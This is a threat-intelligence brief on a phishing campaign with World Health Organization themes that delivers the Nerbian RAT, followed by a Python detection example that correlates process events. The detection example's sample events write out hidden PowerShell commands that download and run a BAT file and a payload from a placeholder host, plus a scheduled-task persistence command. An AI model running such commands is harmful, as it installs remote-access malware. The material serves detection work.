May 17, 2022

Phishing with World Health Organization Themes

Industry: N/A | Level: Tactical | Source: Proofpoint

Research from Proofpoint has identified distribution of the Nerbian remote access trojan (RAT) through phishing emails using COVID-19 and World Health Organization themes. The campaign was traced back to April 26th, 2022, with emails targeting entities located in Italy, Spain, and the United Kingdom. The emails contain either a malicious document or a compressed archive containing a malicious document. When the embedded macro executes, the process flow is: CMD calls PowerShell to download a BAT file, and the BAT file launches PowerShell to download additional payloads, including the RAT. The RAT establishes persistence and can download further payloads as needed. There is currently no attribution for the Nerbian RAT.

Anvilogic Scenario:

  • Nerbian RAT Infection Chain from Malicious Document

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Suspicious Executable by CMD.exe
  • Executable Create Script Process
  • Invoke-WebRequest Command
  • Executable File Written to Disk
  • Suspicious Executable by Powershell
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Create/Modify Schtasks
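The infection chain above and several of the listed use cases, modelled as a small correlation over process-creation telemetry. This is an added example, not Anvilogic's or Proofpoint's own detection content; the Sysmon-style field names, the sample events, the file names and the `.invalid` URL are all constructed placeholders.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # executable file name, lower-case (assumed Sysmon-style fields)
    path: str      # full path of the executable, lower-case
    cmdline: str

OFFICE_APPS = {"winword.exe", "excel.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

def flag_event(ev: ProcEvent, parent: Optional[ProcEvent]) -> list:
    """Labels (named after the use cases above) that fire on one event."""
    cl, hits = ev.cmdline.lower(), []
    if parent and parent.image in OFFICE_APPS and ev.image == "cmd.exe":
        hits.append("Malicious Document Execution")
    if parent and parent.image == "cmd.exe" and ev.image == "powershell.exe":
        hits.append("Suspicious Executable by CMD.exe")
    if ev.image == "powershell.exe" and "invoke-webrequest" in cl:
        hits.append("Invoke-WebRequest Command")
    if ev.image == "cmd.exe" and ".bat" in cl:
        hits.append("Executable Create Script Process")
    if any(d in ev.path for d in USER_WRITABLE):
        hits.append("Executable Process from Suspicious Folder")
    if ev.image == "schtasks.exe" and "/create" in cl:
        hits.append("Create/Modify Schtasks")
    return hits

def detect_chain(events) -> set:
    """Correlate one host's events by pid/ppid and return every stage that fired."""
    by_pid = {e.pid: e for e in events}
    return {h for ev in events for h in flag_event(ev, by_pid.get(ev.ppid))}

def chain_detected(events, min_stages: int = 3) -> bool:
    """Scenario-level verdict: enough distinct stages seen on the same host."""
    return len(detect_chain(events)) >= min_stages

# Constructed sample telemetry; file names and the .invalid URL are placeholders.
SYS, T = "c:\\windows\\system32\\", "c:\\users\\u\\appdata\\local\\temp\\"
PS = SYS + "windowspowershell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "winword.exe", "c:\\program files\\office\\winword.exe", "winword /n invoice.docm"),
    ProcEvent(200, 100, "cmd.exe", SYS + "cmd.exe", "cmd /c powershell -w hidden Invoke-WebRequest http://dl.invalid/s.bat -OutFile " + T + "s.bat & " + T + "s.bat"),
    ProcEvent(300, 200, "powershell.exe", PS, "powershell -w hidden Invoke-WebRequest http://dl.invalid/s.bat -OutFile " + T + "s.bat"),
    ProcEvent(400, 200, "cmd.exe", SYS + "cmd.exe", "cmd /c " + T + "s.bat"),
    ProcEvent(500, 400, "powershell.exe", PS, "powershell Invoke-WebRequest http://dl.invalid/payload.exe -OutFile " + T + "payload.exe"),
    ProcEvent(600, 500, "payload.exe", T + "payload.exe", T + "payload.exe"),
    ProcEvent(700, 600, "schtasks.exe", SYS + "schtasks.exe", "schtasks /create /tn upd /tr " + T + "payload.exe /sc minute"),
]
```

Requiring several distinct stages on one host before raising the scenario keeps a lone `Invoke-WebRequest` or scheduled-task creation from paging anyone, while the per-event labels remain available for hunting.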